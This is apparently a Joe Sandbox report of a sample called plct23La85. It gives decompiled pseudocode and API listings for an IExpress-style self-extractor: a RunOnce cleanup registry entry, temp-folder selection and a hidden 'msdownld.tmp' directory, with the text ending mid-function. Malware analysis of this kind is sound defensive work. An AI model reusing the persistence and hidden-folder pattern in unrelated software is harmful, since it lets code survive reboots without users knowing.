                                                                                                                                                                                                    0x00132c89
                                                                                                                                                                                                    0x00132c87
                                                                                                                                                                                                    0x00132c7c
                                                                                                                                                                                                    0x00132c74
                                                                                                                                                                                                    0x00132c8e
                                                                                                                                                                                                    0x00132c95
                                                                                                                                                                                                    0x00132c98
                                                                                                                                                                                                    0x00132c98
                                                                                                                                                                                                    0x00132c9e
                                                                                                                                                                                                    0x00132ca7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000002,00000000,?,00136BB0,00130000,00000000,00000002,0000000A), ref: 00132C03
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00136BB0,00130000,00000000,00000002,0000000A), ref: 00132C18
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00132C28
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00136BB0,00130000,00000000,00000002,0000000A), ref: 00132C98
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                    • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                    • API String ID: 62482547-3460614246
                                                                                                                                                                                                    • Opcode ID: e90687157d8e866ceb7bc0b3de6533ca488536606dcf06e7b9afcde162e597b2
                                                                                                                                                                                                    • Instruction ID: 2b6f940bbc4893085194dfa2137ee4f49e206b91d478af102330fdbd15d7dc44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e90687157d8e866ceb7bc0b3de6533ca488536606dcf06e7b9afcde162e597b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C11D671300305ABD7207BB5AC89A6F3B6D9F887A0F141015FD85E3691DFB1DC81C6A2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00136F40() {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(E00136EF0); // executed
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x00136f45
                                                                                                                                                                                                    0x00136f4d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00136F45
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                    • Opcode ID: 06912507bc4a1566bba819f6a704d0ff4c37028e3ae888a5eacada8e6b706545
                                                                                                                                                                                                    • Instruction ID: 5777c60f317f6b2aac26877b9f2e912aa6dfea9abf6a20b612a9fc9fce4e5375
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06912507bc4a1566bba819f6a704d0ff4c37028e3ae888a5eacada8e6b706545
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA90026425110057D6105B709D1D41579915F4D603FC29470A051C8894DB6140885512
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E0013202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                    				void* _v532;
                                                                                                                                                                                                    				int _v536;
                                                                                                                                                                                                    				int _v540;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				struct HINSTANCE__* _t46;
                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				void _t56;
                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				intOrPtr* _t81;
                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t79 = __edx;
                                                                                                                                                                                                    				_t28 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                    				_t84 = 0x104;
                                                                                                                                                                                                    				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                    				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                    				_t95 = _t94 + 0x18;
                                                                                                                                                                                                    				_t66 = 0;
                                                                                                                                                                                                    				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                    					return E00136CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(_t86);
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					E0013171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                    					_t95 = _t95 + 0x10;
                                                                                                                                                                                                    					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t87 = _t87 + 1;
                                                                                                                                                                                                    					if(_t87 < 0xc8) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t87 != 0xc8) {
                                                                                                                                                                                                    					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                    					_t79 = _t84;
                                                                                                                                                                                                    					E0013658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                    					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                    					_t84 = _t46;
                                                                                                                                                                                                    					if(_t84 == 0) {
                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x139a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                    							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							_pop(_t86);
                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						_t72 =  &_v268;
                                                                                                                                                                                                    						_t80 = _t72 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t49 =  *_t72;
                                                                                                                                                                                                    							_t72 = _t72 + 1;
                                                                                                                                                                                                    						} while (_t49 != 0);
                                                                                                                                                                                                    						_t73 = _t72 - _t80;
                                                                                                                                                                                                    						_t81 = 0x1391e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t50 =  *_t81;
                                                                                                                                                                                                    							_t81 = _t81 + 1;
                                                                                                                                                                                                    						} while (_t50 != 0);
                                                                                                                                                                                                    						_t84 = _t73 + 0x50 + _t81 - 0x1391e5;
                                                                                                                                                                                                    						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1391e5);
                                                                                                                                                                                                    						if(_t90 != 0) {
                                                                                                                                                                                                    							 *0x138580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                    							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                    								_t54 = "%s /D:%s";
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                    							E0013171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                    							_t75 = _t90;
                                                                                                                                                                                                    							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                    							_t79 = _t23;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t56 =  *_t75;
                                                                                                                                                                                                    								_t75 = _t75 + 1;
                                                                                                                                                                                                    							} while (_t56 != 0);
                                                                                                                                                                                                    							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                    							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                    							RegCloseKey(_v532); // executed
                                                                                                                                                                                                    							_t36 = LocalFree(_t90);
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t79 = 0x4b5;
                                                                                                                                                                                                    						E001344B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                    					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                    					FreeLibrary(_t84); // executed
                                                                                                                                                                                                    					if(_t91 == 0) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    						E0013658A( &_v268, 0x104, 0x131140);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    				 *0x138530 = _t66;
                                                                                                                                                                                                    				goto L23;
                                                                                                                                                                                                    			}

































                                                                                                                                                                                                    0x0013202a
                                                                                                                                                                                                    0x00132035
                                                                                                                                                                                                    0x0013203c
                                                                                                                                                                                                    0x00132041
                                                                                                                                                                                                    0x00132050
                                                                                                                                                                                                    0x0013205f
                                                                                                                                                                                                    0x00132064
                                                                                                                                                                                                    0x0013206f
                                                                                                                                                                                                    0x0013208c
                                                                                                                                                                                                    0x00132094
                                                                                                                                                                                                    0x00132257
                                                                                                                                                                                                    0x00132266
                                                                                                                                                                                                    0x00132266
                                                                                                                                                                                                    0x0013209a
                                                                                                                                                                                                    0x0013209b
                                                                                                                                                                                                    0x0013209d
                                                                                                                                                                                                    0x001320aa
                                                                                                                                                                                                    0x001320af
                                                                                                                                                                                                    0x001320c9
                                                                                                                                                                                                    0x001320d1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001320d3
                                                                                                                                                                                                    0x001320da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001320da
                                                                                                                                                                                                    0x001320e2
                                                                                                                                                                                                    0x00132103
                                                                                                                                                                                                    0x0013210e
                                                                                                                                                                                                    0x00132116
                                                                                                                                                                                                    0x00132122
                                                                                                                                                                                                    0x00132128
                                                                                                                                                                                                    0x0013212c
                                                                                                                                                                                                    0x00132179
                                                                                                                                                                                                    0x00132194
                                                                                                                                                                                                    0x001321de
                                                                                                                                                                                                    0x001321e4
                                                                                                                                                                                                    0x00132256
                                                                                                                                                                                                    0x00132256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132256
                                                                                                                                                                                                    0x00132196
                                                                                                                                                                                                    0x00132196
                                                                                                                                                                                                    0x0013219c
                                                                                                                                                                                                    0x0013219f
                                                                                                                                                                                                    0x0013219f
                                                                                                                                                                                                    0x001321a1
                                                                                                                                                                                                    0x001321a2
                                                                                                                                                                                                    0x001321a6
                                                                                                                                                                                                    0x001321a8
                                                                                                                                                                                                    0x001321b0
                                                                                                                                                                                                    0x001321b0
                                                                                                                                                                                                    0x001321b2
                                                                                                                                                                                                    0x001321b3
                                                                                                                                                                                                    0x001321bc
                                                                                                                                                                                                    0x001321c7
                                                                                                                                                                                                    0x001321cb
                                                                                                                                                                                                    0x001321f1
                                                                                                                                                                                                    0x001321f6
                                                                                                                                                                                                    0x001321fd
                                                                                                                                                                                                    0x001321ff
                                                                                                                                                                                                    0x001321ff
                                                                                                                                                                                                    0x00132204
                                                                                                                                                                                                    0x00132213
                                                                                                                                                                                                    0x00132218
                                                                                                                                                                                                    0x0013221d
                                                                                                                                                                                                    0x0013221d
                                                                                                                                                                                                    0x00132220
                                                                                                                                                                                                    0x00132220
                                                                                                                                                                                                    0x00132222
                                                                                                                                                                                                    0x00132223
                                                                                                                                                                                                    0x00132229
                                                                                                                                                                                                    0x0013223d
                                                                                                                                                                                                    0x00132249
                                                                                                                                                                                                    0x00132250
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132250
                                                                                                                                                                                                    0x001321d2
                                                                                                                                                                                                    0x001321d9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001321d9
                                                                                                                                                                                                    0x0013213a
                                                                                                                                                                                                    0x00132141
                                                                                                                                                                                                    0x00132144
                                                                                                                                                                                                    0x0013214c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132163
                                                                                                                                                                                                    0x00132172
                                                                                                                                                                                                    0x00132172
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132163
                                                                                                                                                                                                    0x001320ea
                                                                                                                                                                                                    0x001320f0
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00132050
                                                                                                                                                                                                    • memset.MSVCRT ref: 0013205F
                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0013208C
                                                                                                                                                                                                      • Part of subcall function 0013171E: _vsnprintf.MSVCRT ref: 00131750
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001320C9
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001320EA
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00132103
                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00132122
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00132134
                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00132144
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0013215B
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0013218C
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001321C1
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001321E4
                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0013223D
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00132249
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00132250
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                    • API String ID: 178549006-2663108224
                                                                                                                                                                                                    • Opcode ID: f4f64c613c7a3f8849c13612593081544217ad1352cfa295d97360608dfcaca0
                                                                                                                                                                                                    • Instruction ID: 75f1f56ba1b5f54dbe41a23e7f4abe6d974bb3f7b2b868e34416697b2bf6d9a1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4f64c613c7a3f8849c13612593081544217ad1352cfa295d97360608dfcaca0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0251B771A00214BBDB24AB64DC49FFB7B7CEF55700F0441A4F989E7151DBB19E898A60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 232 1355a0-1355d9 call 13468f LocalAlloc 235 1355db-1355f1 call 1344b9 call 136285 232->235 236 1355fd-13560c call 13468f 232->236 250 1355f6-1355f8 235->250 242 135632-135643 lstrcmpA 236->242 243 13560e-135630 call 1344b9 LocalFree 236->243 244 135645 242->244 245 13564b-135659 LocalFree 242->245 243->250 244->245 248 135696-13569c 245->248 249 13565b-13565d 245->249 255 1356a2-1356a8 248->255 256 13589f-1358b5 call 136517 248->256 252 135669 249->252 253 13565f-135667 249->253 254 1358b7-1358c7 call 136ce0 250->254 257 13566b-13567a call 135467 252->257 253->252 253->257 255->256 260 1356ae-1356c1 GetTempPathA 255->260 256->254 270 135680-135691 call 1344b9 257->270 271 13589b-13589d 257->271 264 1356f3-135711 call 131781 260->264 265 1356c3-1356c9 call 135467 260->265 275 135717-135729 GetDriveTypeA 264->275 276 13586c-135890 GetWindowsDirectoryA call 13597d 264->276 269 1356ce-1356d0 265->269 269->271 273 1356d6-1356df call 132630 269->273 270->250 271->254 273->264 286 1356e1-1356ed call 135467 273->286 280 135730-135740 GetFileAttributesA 275->280 281 13572b-13572e 275->281 276->264 287 135896 276->287 284 135742-135745 280->284 285 13577e-13578f call 13597d 280->285 281->280 281->284 289 135747-13574f 284->289 290 13576b 284->290 298 1357b2-1357bf call 132630 285->298 299 135791-13579e call 132630 285->299 286->264 286->271 287->271 292 135771-135779 289->292 294 135751-135753 289->294 290->292 297 135864-135866 292->297 294->292 295 135755-135762 call 136952 294->295 295->290 308 135764-135769 295->308 297->275 297->276 306 1357d3-1357f8 call 13658a GetFileAttributesA 298->306 307 1357c1-1357cd GetWindowsDirectoryA 298->307 299->290 309 1357a0-1357b0 call 13597d 299->309 314 13580a 306->314 315 1357fa-135808 CreateDirectoryA 306->315 307->306 308->285 308->290 309->290 309->298 316 13580d-13580f 314->316 315->316 317 135811-135825 316->317 318 135827-13585c SetFileAttributesA call 131781 call 135467 316->318 317->297 318->271 323 13585e 318->323 323->297
                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E001355A0(void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v265;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t35;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                    				int _t44;
                                                                                                                                                                                                    				long _t48;
                                                                                                                                                                                                    				int _t49;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				int _t54;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				char _t60;
                                                                                                                                                                                                    				int _t65;
                                                                                                                                                                                                    				char _t66;
                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				int _t70;
                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                    				int _t73;
                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                    				CHAR* _t88;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                    				_t2 = E0013468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                    				if(_t109 != 0) {
                                                                                                                                                                                                    					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                    					_t32 = E0013468F(_t82, _t109, 1);
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                    						__eflags = _t33;
                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                    							 *0x139a30 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						_t35 =  *0x138b3e; // 0x0
                                                                                                                                                                                                    						__eflags = _t35;
                                                                                                                                                                                                    						if(_t35 == 0) {
                                                                                                                                                                                                    							__eflags =  *0x138a24; // 0x0
                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                    								L46:
                                                                                                                                                                                                    								_t101 = 0x7d2;
                                                                                                                                                                                                    								_t36 = E00136517(_t82, 0x7d2, 0, E00133210, 0, 0);
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_t38 =  ~( ~_t36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0x139a30; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t109 = 0x1391e4;
                                                                                                                                                                                                    									_t40 = GetTempPathA(0x104, 0x1391e4);
                                                                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                    										_push(_t82);
                                                                                                                                                                                                    										E00131781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                    										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                    										if(_v268 <= 0x5a) {
                                                                                                                                                                                                    											do {
                                                                                                                                                                                                    												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                    												__eflags = _t109 - 6;
                                                                                                                                                                                                    												if(_t109 == 6) {
                                                                                                                                                                                                    													L22:
                                                                                                                                                                                                    													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                    													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L23;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													__eflags = _t109 - 3;
                                                                                                                                                                                                    													if(_t109 != 3) {
                                                                                                                                                                                                    														L23:
                                                                                                                                                                                                    														__eflags = _t109 - 2;
                                                                                                                                                                                                    														if(_t109 != 2) {
                                                                                                                                                                                                    															L28:
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															goto L29;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															__eflags = _t66 - 0x41;
                                                                                                                                                                                                    															if(_t66 == 0x41) {
                                                                                                                                                                                                    																L29:
                                                                                                                                                                                                    																_t60 = _t66 + 1;
                                                                                                                                                                                                    																_v268 = _t60;
                                                                                                                                                                                                    																goto L42;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																__eflags = _t66 - 0x42;
                                                                                                                                                                                                    																if(_t66 == 0x42) {
                                                                                                                                                                                                    																	goto L29;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t68 = E00136952( &_v268);
                                                                                                                                                                                                    																	__eflags = _t68;
                                                                                                                                                                                                    																	if(_t68 == 0) {
                                                                                                                                                                                                    																		goto L28;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                    																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                    																			L30:
                                                                                                                                                                                                    																			_push(0);
                                                                                                                                                                                                    																			_t103 = 3;
                                                                                                                                                                                                    																			_t49 = E0013597D( &_v268, _t103, 1);
                                                                                                                                                                                                    																			__eflags = _t49;
                                                                                                                                                                                                    																			if(_t49 != 0) {
                                                                                                                                                                                                    																				L33:
                                                                                                                                                                                                    																				_t50 = E00132630(0,  &_v268, 1);
                                                                                                                                                                                                    																				__eflags = _t50;
                                                                                                                                                                                                    																				if(_t50 != 0) {
                                                                                                                                                                                                    																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t88 =  &_v268;
                                                                                                                                                                                                    																				E0013658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                    																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                    																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                    																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                    																					__eflags = _t54;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				__eflags = _t54;
                                                                                                                                                                                                    																				if(_t54 != 0) {
                                                                                                                                                                                                    																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                    																					_push(_t88);
                                                                                                                                                                                                    																					_t109 = 0x1391e4;
                                                                                                                                                                                                    																					E00131781(0x1391e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                    																					_t101 = 1;
                                                                                                                                                                                                    																					_t59 = E00135467(0x1391e4, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t59;
